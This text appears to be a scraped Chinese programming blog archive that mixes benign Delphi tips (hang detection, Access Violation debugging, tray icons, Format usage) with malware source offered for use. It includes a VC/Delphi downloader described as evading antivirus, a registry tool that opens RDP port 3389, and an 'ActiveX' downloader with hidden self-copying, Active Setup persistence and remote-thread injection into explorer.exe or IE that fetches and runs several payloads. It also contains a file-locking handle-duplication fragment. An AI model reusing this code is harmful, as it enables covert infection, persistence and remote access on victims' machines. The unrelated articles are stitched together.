这段代码将集成在 Rarnu Script 保护线程内，用于监视程序/VM是否无响应

 function    IsAppRespondig9X(dwThreadId:    DWORD):    Boolean; 
   type     
       TIsHungThread    =    function(dwThreadId:    DWORD):    BOOL;    stdcall;     
   var     
       hUser32:    THandle;     
       IsHungThread:    TIsHungThread;     
   begin     
       Result    :=    True;     
       hUser32    :=    GetModuleHandle('user32.dll');     
       if    (hUser32    >    0)    then     
       begin     
           @IsHungThread    :=    GetProcAddress(hUser32,    'IsHungThread');     
           if    Assigned(IsHungThread)    then     
           begin     
               Result    :=    not    IsHungThread(dwThreadId);     
           end;     
       end;     
   end;     
  
   function    IsAppRespondigNT(wnd:    HWND):    Boolean;     
   type     
       TIsHungAppWindow    =    function(wnd:hWnd):    BOOL;    stdcall;     
   var     
       hUser32:    THandle;     
       IsHungAppWindow:    TIsHungAppWindow;     
   begin     
       Result    :=    True;     
       hUser32    :=    GetModuleHandle('user32.dll');     
       if    (hUser32    >    0)    then     
       begin     
           @IsHungAppWindow    :=    GetProcAddress(hUser32,    'IsHungAppWindow');     
           if    Assigned(IsHungAppWindow)    then     
           begin     
               Result    :=    not    IsHungAppWindow(wnd);     
           end;     
       end;     
   end;     
    
   function    IsAppRespondig(Wnd:    HWND):    Boolean;     
   begin     
     if    not    IsWindow(Wnd)    then     
     begin     
         ShowMessage('Incorrect    window    handle!');     
         Exit;     
     end;     
     if    Win32Platform    =    VER_PLATFORM_WIN32_NT    then     
         Result    :=    IsAppRespondigNT(wnd)     
     else     
         Result    :=    IsAppRespondig9X(GetWindowThreadProcessId(Wnd,nil));     
   end;     
    
   procedure    TForm1.Button1Click(Sender:    TObject);     
   var     
       Res:    DWORD;     
       h:    HWND;     
   begin     
       h    :=    FindWindow(nil,   'notepad');     
       if    h    >    0    then     
       begin     
           if    IsAppRespondig(h)    then     
               ShowMessage('notepad 有响应')     
           else     
               ShowMessage('notepad 无响应');     
       end     
       else     
           ShowMessage('未打开 notepad');     
   end;

Copyright © 2008

继续阅读《判断程序是否无响应》的全文内容...

找不到相关文章，请发表流言

     Access Violation（非法访问），General Protection Fault（一般保护性错误）或者Invalid Page Fault（无效页面错误），虽然说法不一样，但本质上总是由同一种错误引起的。Access Violation常常在计算机用户运行的程序试图存取未被指定使用的存储区时遇到。
Access violation at address <十六进制值>
in module <应用程序名>
Read of address <十六进制值>

　　Windows用户可能经常会看到类似于错误提示：“Error：Access violation at address 836556F8（004096da）. Read of address 836556F8（00401000）”。作为一个Delphi程序开发者，遇到这种错误的机会比其他用户更多(^_^)。

　　一旦Windows要在它被分配的存储区之外写数据信息，它就会覆盖其他程序甚至操作系统的命令或数据。一旦发生了这种情况，操作系统将会瘫痪或者以某种形式关闭，你必须重新启动计算机。例如，在Windows NT/2000下一个程序遇到这种错误时，Dr. Watson出现并且停止了该程序，捕获了一些快速的细节状态，再把它们用文本形式记录下来。Access Violation是某些最令人气恼的Windows程序遇到的错误之一。本文的目的就是让你找到Delphi中Access Violation的解决之道。首先声明一点，Access Violation和Microsoft Access没有任何关系。

　　用Delphi开发程序时，我们可以把遇到的Access Violation分成两大类：运行期和设计期。

一、设计期的Access Violation

1.硬件原因
　　在启动或关闭Delphi IDE以及编译一个Delphi工程时容易出现设计期的Access Violation。在你的计算机运行中出现Access Violation信息可能由各种各样的原因引起，包括系统BIOS、操作系统或者是硬件驱动线，有些声卡、显卡、网卡实际上也会导致这种错误。为什么这么说？计算机里的每一块卡都有它的设备驱动程序。对于不同的制造商、不同版本的Windows或者不同版本的Delphi都可能会遇到不同的问题。如下的几个步骤可能有助于你解决遇到的这些问题：

　　1. 按照必要的步骤来证实你安装的驱动程序之间没有冲突。

　　2. 有时降低显示分辨率可能会使某些古怪的显卡驱动程序稳定一些。

　　3. 如果使用双处理器的主板，则保证对每个处理器的修改步骤一样。

　　4. 对于计算机上的所有硬件注意使用最新的驱动程序。

2.软件原因
　　尽管Intel的计算机中Windows是最流行的操作系统，由于Windows系统天生的脆弱性和BUG，应用程序的误操作可能导致操作系统的迅速瘫痪（有时操作系统本身也会莫名其妙的瘫痪）。选择一个更稳定的程序开发环境是解决之道，如下几个步骤可以帮助你防止某些Access Violation的发生：

　　（1）尽管Windows 9X相当流行，Windows NT/2000还是从多方面被证实是一个稳定得多的环境，几乎对于所有的Windows代码平台而言都是这样。

（2） 确保对于Windows NT/2000已经安装了最新的service pack。每次安装完新版的service pack，你会发现机器变得稳定了。

（3） 为你使用的各种版本的Delphi装上当前的更新或补丁（BDE、ADO……），这是提前预防错误的好办法。尽量使用最新的Delphi补丁——Access Violation错误数量尤其是设计期的错误数会大大减少。

（4）如果你在IDE中经常随机遇到Access Violation错误，很有可能是你安装了一个不好的控件、包或者一个向导，它不是你使用的版本的Delphi所编写或编译的。试着一个一个卸载定制的控件（或者包）直到问题被解决，然后联系控件厂商关注这个问题的结果。

（5） 检查一下计算机里是否有没用的东西和程序冲突。奇怪的软件程序和测试版的产品常常会导致Access Violation错误。

（6） 如果系统设置有错误，那么Access Violation错误可能也会经常出现。如果你不停地遇到一个错误提示信息一样的Access Violation，记录下这些细节，然后通知可能导致这个错误的软件制造厂商。

这些就是我对设计期Access Violation错误的全部建议。

二、运行期的Access Violation
Delphi常见的运行期Access Violation错误有哪些？如何防止？

任何软件开发都会遇到这样的情况：你写好程序并测试，然后到处发送，结果用户告诉你它失败了。

你可能考虑用编译指令{$D}编译你的程序——Delphi可以建立一个有助于定位Access Violation错误的源代码的镜像文件。工程选项对话框（Project|Options|Linker & Compiler）让你指定你所需要的一切。对于单元文件，debug信息和单元的对象代码一起记录在unit文件里了。编译使用这个单元的程序时，debug信息会增加单元文件的大小而且会增加额外的内存开销，但是它不会影响最终可执行文件的大小和运行速度。包含debug信息和镜像文件（Project|Options|Linker）选项的产品只有在{$D+} 编译指令下才会完成行信息。

Access violation通常只在程序的某一个方面表现出来。当问题第一次出现时，考虑一下用户进行了什么操作是很重要的，然后从这里寻找突破口。从用户的角度来看，你的程序中止了他们的工作，由他们来告诉你出现的问题似乎让你延期解决这个问题了。然而，与用户交流是你发现问题和改善程序的惟一有效方法。

现在你将可以知道在只给你冲突地址的情况下，如何轻松发现准确路径、源代码文件、发生Access violation错误的行：
“Search - Find Error…”。

当一个运行期Access violation出现时，你的用户得到的错误信息类似于如下情况：
Access violation at address <十六进制值>
in module <应用程序名>
Read of address <十六进制值>

如果你的程序在Delphi IDE里包含debug信息编译，你可以定位到导致这个错误源代码这一行。
在Delphi程序中，一个最普遍导致Access Violation错误的原因是使用了一个没有被创建的对象。如果第二个地址<十六进制值>是FFFFFFF或0000000，十有八九就是你访问? 了一个没有被建立的对象。例如，你调用了一个表单的事件，但这个表单不是自动创建的，也没有代码实例化。

?procedure TfrMain.OnCreate(Sender: TObject);
var BadForm: TBadForm;
begin
//这里将会产生Access violation
BadForm.Refresh;
end;

假设BadForm在工程选项“Available Forms”窗口列表里——这个窗口是需要手工创建和释放的。在上面的代码里调用BadForm窗口的Refresh方法就会导致Access violation。

如果你在Debugger选项窗口使“Stop on Delphi Exceptions”生效，那么就会弹出下面的信息：
The message states that the EAccessViolation has occurred. The EAccessViolation is the exception class for invalid memory access errors.

这是你在设计程序时将会看到的信息，下一个信息框将会出现，然后程序失败了：
Access violation at address 0043F193
in module ’Project1.exe’
Read of address 000000.

第一个十六进制数0043F193是发生Access violation的编译代码（Project1.exe）的运行期错误的地址。在IDE里选择菜单项“Search|Find Error…”，在对话框里输入错误发生的地址（0043F193）后点击“OK”按钮。Delphi将会重新编译你的工程文件，然后显示发生运行期错误的那一行代码，这里就是BadForm.Refresh这一行了。

下面列出了Delphi环境下导致Access violation错误的大部分常见原因。这个列表不是也不可能覆盖所有可能出现的Access violation的情况。请在论坛上发送你的Access violation信息，大家可以试着一起解决这个问题——真正的实际事例一般情况下比列出来的错误隐晦得多。

1. 调用一个不存在的对象
如上所述，大部分Access violation的合理原因是使用了没有被创建或者已经被释放的对象。为了防止这种类型的Access violation的发生，请确保你访问的任何对象都首先被创建了。例如，当一个Table定位在一个没有被创建的data module（从auto-crete窗口里移走了）里，你可能在窗体的OnCreate事件里打开这个表。

在下面的代码里，在调用一个已经被删除了的对象（b:TBitmap）事件后，一个Access violation出现了：
var b:TBitmap;
begin
b:=TBitmap.Create;
try
//对b对象进行一些操作
finally
b.free;
end;
...
//由于b已经被释放，一个Access violation错误将会出现
b.Canvas.TextOut(0,0,’这是一个 Access Violation’);
end;

2. 不存在的API参数
如果你试图给Win API函数传递一个不存在的参数将会出现一个Access violation错误。解决此类Access violation错误的最好方法是查阅Win API帮助，看看这个API函数调用的参数信息以及参数类型。例如，总是保证不给一个缓冲参数传递一个无效指针。

3. 让Delphi释放
当一个对象拥有另一个对象时，让它给你做删除工作。因为默认情况下，所有的窗体（自动创建的）都属于Application对象。当一个应用程序结束时，它释放了Application对象，也就释放了所有窗体。例如，如果你在程序开始时自动创建了两个窗体（Form1/Unit1和Form2/Unit2），下面的代码就会导致Access violation错误的出现：
unit Unit1;
...
uses unit2;
...
procedure TForm1.Call_Form2
begin
Form2.ShowModal;
Form2.Free;
//Access violation错误将会出现
Form2.ShowModal;
end;

4. 杀死异常
永远不要破坏临时异常对象（E），处理一个异常会自动释放异常对象。如果你自己手动释放了异常对象，程序会试图再次释放它，那么就会出现Access violation错误：
Zero:=0;
try
dummy:= 10 / Zero;
except
on E: EZeroDivide do
MessageDlg(’不能用0做除数!’,mtError, [mbOK], 0);
E.free. ////Access violation错误将会出现
end;

5. 检索一个空字符串
一个空字符串是没有任何数据的。就是说，检索一个空字符串相当于访问一个不存在的对象，这将导致Access violation错误：
var s: string;
begin
s:=’’;
s[1]:=’a’;
//Access violation错误将会出现
end;

6. 直接引用指针
你必须间接引用指针，否则你会改变指针地址并可能会破坏其他存储单元 ：
procedure TForm1.Button1Click(Sender: TObject);
var
p1 : pointer;
p2 : pointer;
begin
GetMem(p1, 128);
GetMem(p2, 128);
//下一行导致Access violation错误
Move(p1, p2, 128);
//下一行方法正确
Move(p1^, p2^, 128);
FreeMem(p1, 128);
FreeMem(p2, 128);
end;
这些就是我对运行期Access Violation错误的全部建议，我希望你们也能对你们程序出现的Access Violation错误提出一些看法。

Copyright © 2008

继续阅读《Access Violation（非法访问）错误的解决方法》的全文内容...

相关文章:

在delphi程序中屏蔽所有错误  (2009-6-1 10:6:47)

delphi编写的时出现 runtime error 216 at 数字 的解决方法  (2009-4-30 14:35:18)

[原创]明生小记之delphi错误处理  (2009-4-1 9:15:14)

raise 语句: 抛出异常   (2009-3-3 11:5:14)

#pragma comment(lib, "urlmon.lib")
#include
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200")
#pragma comment(linker,"/ENTRY:Simen /MERGE:.rdata=.text /MERGE:.data=.text")

int DownExeTest()
{
char strPath[MAX_PATH];
HANDLE hMutex = NULL;
hMutex = CreateMutex(NULL, FALSE, "TestC");
if (hMutex != NULL)
{
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
{
URLDownloadToFile(0, "http://127.0.0.1/1.exe", "C:\\aaa.exe", 0, 0);
WinExec("C:\\aaa.exe", SW_SHOW);
ExitProcess(-1);
}
}
else
{
GetModuleFileName(GetModuleHandle(NULL), strPath, sizeof(strPath));
WinExec(strPath, SW_HIDE);
ExitProcess(-1);
}
}
return 0;
}
/*
int DownExe()
{
URLDownloadToFile(0, "http://127.0.0.1/1.exe", "C:\\aaa.exe", 0, 0);
WinExec("C:\\aaa.exe", SW_SHOW);
ExitProcess(-1);
return 0;
}
*/
int Simen()
{
//DownExe(); //没有处理的 被杀..
DownExeTest(); //处理的 免杀..
return 0; 

program Main;
uses
Windows,
Urlmon;
procedure DownExeTest();
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, 'TestD');
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
URLDownloadToFile(nil, 'http://127.0.0.1/1.exe', 'c:\test.exe', 0, nil);
WinExec('c:\test.exe', SW_SHOW);
end else
begin
WinExec(pchar(paramstr(0)),SW_HIDE);
end;
end;
end;

{
procedure DownExe();
begin
URLDownloadToFile(nil, 'http://127.0.0.1/1.exe', 'c:\test.exe', 0, nil);
WinExec('c:\test.exe', SW_SHOW);
end;
}

begin
// DownExe(); //没有处理的 被杀..
DownExeTest(); //处理的 免杀..
end.

}

Copyright © 2008

继续阅读《最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本]》的全文内容...

相关文章:

delphi用wininet函数下载HTTP文件  (2009-4-2 8:45:20)

打造无DLL版穿墙Downloader  (2009-1-20 6:49:53)

用Delphi实现文件下载的几种方法  (2009-1-20 6:14:51)

{$APPTYPE CONSOLE}
uses
    SysUtils, Registry, Windows;
var
reg:TRegistry;
procedure Help;
begin
    writeln('');
    writeln('======Win XP&2003 Open3389 by lanyu====== ');
    Writeln('Useag '+ExtractFileName(Paramstr(0))+' [/n]');
end;
begin
    { TODO -oUser -cConsole Main : Insert code here }
    if ParamCount>2 then
    begin
      help;
      exit;
    end;
    reg:=TRegistry.Create;
    reg.RootKey:=HKEY_LOCAL_MACHINE;
    reg.OpenKey('SYSTEM\CurrentControlSet\Control\Terminal Server',true);
    if ParamCount=1 then
    begin
    if Paramstr(1)='/n' then
    begin
      try
        reg.WriteBool('fDenyTSConnections',true);
        Writeln('Close 3389 successfully');
      except
        Writeln('Close 3389 fail');
      end;
    end
    else
      begin
        Help;
        Exit;
      end;
    end
    else
    begin
      try
        reg.WriteBool('fDenyTSConnections',false);
        writeln('Open 3389 successfully');
      except
        writeln('Open 3389 fail');
      end;
    end;
    reg.Free;
end. 

暗组信息安全论坛
修改注册表一个键值复制内容到剪贴板代码:
program Open3389;

Copyright © 2008

继续阅读《XP/2003下Delphi最简单的方法开放3389》的全文内容...

找不到相关文章，请发表流言

Copyright © 2008

继续阅读《Ring3下注入DLL的另类方法，能过杀软和游戏NP（源码）》的全文内容...

找不到相关文章，请发表流言

程序不出现在任务栏
procedure TForm1.FormShow(Sender: TObject);
begin
ShowWindow(Application.Handle,SW_HIDE);
end;

点击关闭按钮至托盘
procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
begin
CanClose := False;
Self.Hide;
end;
但这儿有个问题,在“开始”菜单中使用关闭或重启系统时，由于程序的存在，系统总是不能关闭或重启， 然后就返回到了桌面。解决方案如下：
//声明拦截WM_QueryEndSession消息的过程
procedure WMQueryEndSession(var Msg: TMessage); message WM_QueryEndSession;

procedure TForm1.WMQueryEndSession(var Msg: TMessage);
begin
   Msg.Result := 1;
end;
经测试，系统关机时不会执行OnClose事件，但会执行OnDestroy事件。另Raize托盘控件RzTrayIcon有QueryEndSession(Sender: TObject;
      var AllowSessionToEnd: Boolean);事件，把AllowSessionToEnd置为真亦可。

最小化到托盘
procedure WMSysCommand(var Msg: TWMSysCommand); message WM_SYSCOMMAND;

procedure TForm1.WMSysCommand(var Msg: TWMSysCommand);
begin
if Msg.CmdType = SC_MINIMIZE then
    Self.Close
else
    inherited;
end;

最大化和最小化时的动画
Type
TZoomAction = (zaMinimize, zaMaximize);

procedure ZoomEffect(AForm: TForm; AOperation: TZoomAction);
var
rcStart, rcEnd, rcTray: TRect;
hwndTray, hwndChild: hWnd;
begin
// 寻找系统托盘区的位置
hwndTray := FindWindow('Shell_TrayWnd', nil);
hwndChild := FindWindowEx(hwndTray, 0, 'TrayNotifyWnd', nil);
GetWindowRect(hwndChild, rcTray);
//点击用于最大化/最小化，并切换起始/结束
if AOperation = zaMinimize then
begin
    rcStart := AForm.BoundsRect;
    rcEnd := rcTray;
end
else begin
    rcEnd := AForm.BoundsRect;
    rcStart := rcTray;
end;
DrawAnimatedRects(AForm.Handle, IDANI_CAPTION, rcStart, rcEnd);
end;
再分别在OnCloseQuery中添加
ZoomEffect(Self, zaMinimize);
在OnShow中添加
ZoomEffect(Self, zaMaximize);

左击托盘显示或者隐藏
在托盘的左击事件中添加
if Self.Showing then
    Self.Close
else begin
    Self.Show;
    SetForegroundWindow(Application.Handle);
end

窗体是否处于激活状态
procedure WM_ACTIVATEAPP( var Message:TWMACTIVATEAPP); message WM_ACTIVATEAPP;

procedure TForm1.WMACTIVATEAPP(var message: TWMACTIVATEAPP);
begin
//是否处于激活窗体状态Message.Active
end;

窗体是否最小化状态
if IsIconic(Self.Handle) then
ShowWindow(Self.Handle, SW_RESTORE);

程序总是显示在最上面
简单的办法是Self.FormStyle := fsStayOnTop；但会出现闪烁，比较好的办法如下
if not ShowOnTop then
   SetWindowPos(Self.Handle , HWND_NOTOPMOST, 0,0,0,0, SWP_NOMOVE + SWP_NOSIZE) //普通窗口
else
   SetWindowPos(Self.Handle, HWND_TOPMOST, 0,0, 0,0, SWP_NOMOVE + SWP_NOSIZE); //最上面

Copyright © 2008

继续阅读《Delphi之托盘程序的问题全书集》的全文内容...

相关文章:

利用Delphi实现系统状态栏图标  (2008-10-30 21:31:8)

转贴请注明：http://www.abcxd.com

例图:

首先是加号显示的位置

procedure TForm1.Button1Click(Sender: TObject);
var
  t1,t2:int64;//计时器
  i:Integer;
begin
  Memo1.Clear;
  t1:=GetTickCount();
  for i:=0 to 1000 do
  begin
    memo1.Lines.Add('心动吧'+'吧动心'+'动吧心'+inttostr(i));
  end;
  t2:=GetTickCount();
  Label2.Caption := FloatToStr((t2-t1)/1000);
end;

然后到Format组合显示

procedure TForm1.Button2Click(Sender: TObject);
var
  t1,t2:int64;//计时器
  i:Integer;
begin
  Memo1.Clear;
  t1:=GetTickCount();
  for i:=0 to 1000 do
  begin
    memo1.Lines.Add(Format('%s%s%s%s',['心动吧','吧动心','动吧心',inttostr(i)]));
  end;
  t2:=GetTickCount();
  Label4.Caption := FloatToStr((t2-t1)/1000);
end;

 格式化输出具体表:转自万一博客

var
  s: string;
begin
  //指令类型 type

  s := Format('最大整数是: %d; 最小整数是: %d',[MaxInt,Low(Integer)]);
  //返回: 最大整数是: 2147483647; 最小整数是: -2147483648
  { 提示: 格式指令必须以 % 开始, 不区分大小写, %d 代表一个整数; 第二个参数是一个变体数组 }

  s := Format('最大的无负号整数是: %u',[High(Cardinal)]);
  //返回: 最大的无负号整数是: 4294967295
  { %u表示一个无负号整数 }

  s := Format('输入-2的结果是: %u',[-2]);
  //返回: 输入-2的结果是: 4294967294
  { 如果对应 %u 的是个负数, 则返回: 无负号整数最大值 - 这个数的绝对值 + 1 }

  s := Format('%s! %s',['你好','我是万一']);
  //返回: 你好! 我是万一
  { %s 表示字符串 }

  s := Format('%f',[Pi]);
  //返回: Pi的值是: 3.14
  { %f 表示浮点数, 保留或凑够两位小数点 }

  s := Format('%g',[01.2345000]);
  //返回: 1.2345
  { %g 表示浮点数, 会去掉多余的 0 }

  s := Format('%n',[12345.6789]);
  //返回: 12,345.68
  { %n 表示浮点数, 整数部分使用千位分隔符, 保留两位小数点 }

  s := Format('%m',[12345.6789]);
  //返回: ￥12,345.68
  { %m 表示浮点数, 加货币记号, 转换结果取决于系统的地域设置 }

  s := Format('%e',[12345.6789]);
  //返回: 1.23456789000000E+004
  { %e 用科学计数法表示整数或浮点数 }

  s := Format('%p',[@Self]);
  //返回: 0012F5BC
  { %p 表示指针地址, 用十六进制表示 }

  s := Format('%x',[255]);
  //返回: FF
  { %x 用十六进制表示一个整数 }


  //Index

  s := Format('%s%s',['万','一']);
  s := Format('%0:s%1:s',['万','一']);
  //返回: 万一
  { 上面两行的结果是一样的, 0: 对应数组中的第一个值; 1: 对应数组中的第二个值 }

  s := Format('%1:s%0:s',['万','一']);
  //返回: 一万
  { 翻转了一下顺序 }

  s := Format('%1:s%0:s%0:s%1:s',['万','一']);
  //返回: 一万万一
  { 反复使用 }


  //Width 与对齐方式

  s := Format('%d,%8d,%d',[1,2,3]);
  //返回: 1,       2,3
  { 给第二个值指定了8个字符的宽度, 缺少的用空格填充; 如果指定少了则无效 }

  s := Format('%d,%-8d,%d',[1,2,3]);
  //返回: 1,2       ,3
  { - 表示左对齐, 默认是右对齐的; - 符号在 Width 前面、Index 后面 }


  //指定精度 prec

  s := Format('%.9f',[Pi]);
  //返回: 3.141592654
  { 指定小数点的位数, 取值范围1-9, 输入0也当1用 }

  s := Format('%.5d',[12]);
  //返回: 00012
  { 这是给整数指定位数, 如果小了则无效 }

  s := Format('%.3s',['Format']);
  //返回: For
  { 给字符串指定位数, 如果大了则无效 }

  s := Format('%.3e',[123.456]);
  //返回: 1.23E+002
  { 给科学计数法指定位数 }


  //指令顺序:

  { "%" [index ":"] ["-"] [width] ["." prec] type }

  ShowMessage(s);
end;

Copyright © 2008

继续阅读《[私家货]加号显示与Format区别》的全文内容...

相关文章:

delphi计时器:DELPHI高精度计时方法  (2009-5-5 0:30:17)

格式化输出函数(1): Format  (2009-2-20 17:0:3)

用TXT存取不可见的ASCII字符-方法  (2008-12-28 23:43:30)

把流中的字符串转换为 UTF 格式  (2008-12-27 3:27:20)

如何将字符串用二进制模式写入文件  (2008-10-31 1:37:10)

program InjectTheSelf;

{$IMAGEBASE $13140000}

uses
Windows;

var
//动态加载shell32.dll中的ShellExecuteA函数
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;


//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);

end;

//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin

vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';
RegCloseKey(wmkey);
end;

procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('unlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);

Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);

Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);

Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);

Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);

Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);

Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);

Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);

Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);


ExitProcess(0);
end;

procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID); 
end;

procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;

begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then //注入 media player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;


BEGIN

CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;
copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);
SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',
FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//设置文件系统隐藏属性
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');
RunInject(0); //这里改为 ：1 注入iexplore.exe 0 注入explorer.exe 3注人media player
end.

Copyright © 2008

继续阅读《ActiveX启动下载者（delphi）》的全文内容...

找不到相关文章，请发表流言

program createfile;  
uses  
  Windows, SysUtils;  
//提权函数  
procedure SetPrivilege;  
var  
  TPPrev, TP: TTokenPrivileges;  
  TokenHandle: THandle;  
  dwRetLen: DWORD;  
  lpLuid: TLargeInteger;  
begin  
  OpenProcessToken(GetCurrentProcess, TOKEN_ALL_ACCESS, TokenHandle);  
  if (LookupPrivilegeValue(nil, ’SeDebugPrivilege’, lpLuid)) then  
  begin  
    TP.PrivilegeCount := 1;  
    TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;  
    TP.Privileges[0].Luid := lpLuid;  
    AdjustTokenPrivileges(TokenHandle, False, TP, SizeOf(TPPrev), TPPrev, dwRetLen);  
  end;  
  CloseHandle(TokenHandle);  
end;  
procedure OccupyFile(lpFileName: string);  
var  
  hProcess, hFile, hTargetHandle: thandle;  
begin  
　//打开一个pid为４的进程，只要是存在的进程，都可以  
  hProcess := OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);  
  if (hProcess = 0) then exit;  
  //以独占模式打开目标文件  
  hFile := CreateFileA(PChar(lpFileName), GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);  
  if (hFile = INVALID_HANDLE_VALUE) then  
  begin  
    CloseHandle(hProcess);  
    exit;  
  end;  
  //把文件句柄复制到pid=4的进程中去，这样，只要pid=4的进程不退出，谁也动不了目标文件  
